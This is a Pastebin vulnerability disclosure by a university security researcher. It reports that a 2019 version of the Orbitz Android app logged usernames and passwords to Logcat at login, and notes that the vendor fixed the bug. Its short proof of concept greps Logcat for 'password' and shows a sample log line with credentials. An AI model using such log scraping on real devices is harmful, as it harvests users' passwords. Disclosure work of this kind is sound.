friendlyjlee

Security Bug in Orbitz Android App

Sep 16th, 2019
453
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Exploit Title: Orbitz Android App - Username/Password Logging
  2. # Application: Orbitz
  3. # Version: 19.31.1
  4. # Software Link: https://play.google.com/store/apps/details?id=com.orbitz
  5. # Company: Orbitz
  6. # Installs: 1,000,000+
  7. # Impact: Looking at the output of Logcat, hackers can get username and password of Orbitz
  8. # Category: Mobile Apps
  9. # Tested on: Android 9
  10.  
  11. ---Description---
  12. Usernames and passwords are stored in the log during the authentication. So, hackers can obtain user password/ID of Orbitz, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
  13.  
  14. ---Vendor feedback---
  15. After reporting, the vendor has quickly fixed this problem and released a new version.
  16.  
  17. ---PoC---
  18. 1. Try to login with Orbitz, entering username and password
  19.  
  20. 2. Search password in Logcat
  21. $ adb logcat | grep 'password'
  22. 08-06 18:31:28.036 6213 6294 D OkHttp : email=myOrbizemail%40gmail.com&password=myOrbitPassword&staySignedIn=true&siteid=70201&langid=1033&sourceType=mobileapp&clientid=orbitz.app.android.phone%3A19.31.1
  23.  
  24. ---Reporter---
  25. Jaeho Lee(Jaeho.Lee@rice.edu)
  26. Rice Computer Security Lab
  27. Rice University
RAW Paste Data